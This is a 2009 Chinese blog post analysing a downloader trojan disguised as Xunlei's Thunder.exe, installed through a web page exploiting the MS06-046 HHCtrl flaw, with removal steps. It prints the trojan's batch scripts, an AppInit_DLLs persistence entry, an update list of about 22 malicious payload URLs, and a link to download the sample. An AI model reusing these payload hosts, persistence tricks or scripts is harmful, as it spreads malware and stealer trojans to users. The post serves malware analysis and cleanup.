假冒迅雷下载者病毒--Thunder.exe

      昨天因为有事情,在www.51job.com瞎逛,看有没有适合英语翻译的工作,不知道是在那个网页突然卡巴斯基报警说有病毒,今天检查了下发现网马是http://net.fql12.cn/lz.htm,肯定是一个下载者了。昨天我想卡巴都拦截了就没在意了。
    今天我跑来办公室,一打开电脑,突然发现有提示,询问我是否启动Thunder.exe,我一看是迅雷啊,就觉得奇怪,但是还是点击了允许,差一点点击了建立永久规则,慢慢的我发觉不对了,怎么这个迅雷还建立系统服务的?后面的情况验证了我的猜测,这是一个彻彻底底的下载者病毒,并且是从http://net.fql12.cn/lz.htm上面感染的,哈哈,这个Thunder.exe下载者还是免杀的呢!卡巴2009对运行着的Thunder.exe没有丝毫的反应!!
lz.htm被卡巴拦截
点击放大图片

    附件中的lz.htm是MS06046网马,利用HHCtrl ActiveX控件堆溢出从完全控制用户电脑,过全补丁的windows xp sp2的IE6,而我正好是ie6的游览器,因而中招了,赶快升级到ie7吧!
    这个网马的病毒下载地址解码出来是http://net.fql11.cn/n.exe,md5和Thunder.exe一样。

解密下载地址的方法是:
HTML代码


[Ctrl+A 全部选择 提示:你可先修改部分代码,再按运行]

(pub!1c的代码)


     中毒症状:
1,把Thunder.exe放置到C:\Documents and Settings\Administrator\「开始」菜单\程序\启动文件夹下面,突破了卡巴斯基2009的主动防御,实现自启动,

2, 释放下载者主体文件c:\windows\fonts\F385D020.DLL,插入运行中的每个进程
点击放大图片


3,复制自身到c:\windows\fonts\88199DC.EXE(随机命名),添加自身到系统服务,实现自启动,然后启动下载病毒,
copy2090000.bat
程序代码 程序代码
@echo off
copy /y "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE" "C:\WINDOWS\FONTS\A9A52EC8.EXE" >nul
del %0

del.bat
程序代码 程序代码
@echo off
:selfkill
del /F /Q "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE"
if exist "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE" goto selfkill
del %0


点击放大图片

另外还复制自身到C:\Program Files\wsv.exe,这个应当是网马lz.htm的行为,没发现Thunder.exe有这个特征。

4,访问http://nx.yal99.cn/soft//update.txt获取病毒更新下载列表信息。
程序代码 程序代码
[update] ver=2008102711 url=http://nx.yal99.cn/soft/soft/acab7e5515e97a02.exe updatetimer=60
[startpage] startpage=0 url=ssssssssssssssssssss
[desktop] desktop=0 title1=ww url1=http:// count=1
[file]
file=1 file1=http://ad3.qcl10.cn/mh.exe filename1=ffsea1.exe ftime1=3
file2=http://ad3.qcl10.cn/wd.exe filename2=ffsea2.exe ftime2=3
file3=http://ad3.qcl10.cn/zt.exe filename3=ffsea3.exe ftime3=3
file4=http://ad3.qcl10.cn/my.exe filename4=ffsea4.exe ftime4=3
file5=http://ad3.qcl10.cn/dxc.exe filename5=ffsea5.exe ftime5=3
file6=http://ad3.qcl10.cn/wm.exe filename6=ffsea6.exe ftime6=3
file7=http://ad.qcl10.cn/jx.exe filename7=ffsea7.exe ftime7=3
file8=http://ad3.qcl10.cn/tl.exe filename8=ffsea8.exe ftime8=3
file9=http://ad3.qcl10.cn/qqhx.exe filename9=ffsea9.exe ftime9=3
file10=http://ad.qcl10.cn/zx.exe filename10=ffsea10.exe ftime10=3
file11=http://ad3.qcl10.cn/wow.exe filename11=ffsea11.exe ftime11=4
file12=http://ad3.qcl10.cn/xx.exe filename12=ffsea12.exe ftime12=4
file13=http://ad3.qcl10.cn/kdxy.exe filename13=ffsea13.exe ftime13=4
file14=http://ad3.qcl10.cn/cqwz.exe filename14=ffsea14.exe ftime14=4
file15=http://ad3.qcl10.cn/dj.exe filename15=ffsea15.exe ftime15=4
file16=http://ad3.qcl10.cn/jh.exe filename16=ffsea16.exe ftime16=4
file17=http://ad3.qcl10.cn/cs.exe filename17=ffsea17.exe ftime17=4
file18=http://ad3.qcl10.cn/dh.exe filename18=ffsea18.exe ftime18=4
file19=http://ad3.qcl10.cn/cb.exe filename19=ffsea19.exe ftime19=4
file20=http://ad3.qcl10.cn/mxd.exe filename20=ffsea20.exe ftime20=4
file21=http://ad.qcl10.cn/qqsg.exe filename21=ffsea21.exe ftime21=4
file22=http://ad3.qcl10.cn/cq.exe filename22=ffsea22.exe ftime22=4
count=22
[count] count=0 mecount=0 url=http://nx.yal99.cn/soft/count/count.asp


这个服务器位于温州
点击放大图片
上面绑定的域名全部无实际内容,可以说这是一台完完全全的存放病毒的服务器

全是窃密的木马群
点击放大图片


解决办法:
1,断开网络,防治病毒被修改是从网络上下载新病毒。
2,首先我们需要干掉下载者病毒,然后清除木马群。清除下载者的关键是找到他的系统监控程序,这里很显然就是插入每个进程的下载者c:\windows\fonts\F385D020.DLL。
3,打开icesword,设置-禁止进线程创建
然后强制删除c:\windows\fonts\F385D020.DLL
然后把禁止进线程前面的勾勾去掉,删除启动项中的Thunder
4,最重要的就是这里了,这个需要你安装好杀毒软件,全盘扫描掉木马群,
最经典的表现就是:
C:\WINDOWS\system32\delnice.dll
C:\WINDOWS\system32\delnicek.exe
C:\WINDOWS\system32\kandawf.dll
C:\WINDOWS\system32\qanhllao.dll
C:\WINDOWS\system32\xuntxn.dll
添加到appinit,hook几乎所有程序实现自启动
程序代码 程序代码

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="kandawf.dll delnice.dll qanhllao.dll xuntxn.dll"

映射文件为c:\windows\system32\kandawf.dll
这个onlinegames木马群基本上都有这个特征!因为这个木马群是随时变化的,别无统一的清除办法,如果杀毒软件清除不干净,只能扫描sreng日志,然后手动清除。




病毒样本下载:
纳米下载

以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 金刀客 于 2009-12-30 11:20 PM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 1 | 引用: 0 | 查看次数: -
回复回复vikinglei[2009-09-12 09:47 PM | del]
厉害,以后要常来你这里了,好哈学习!
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.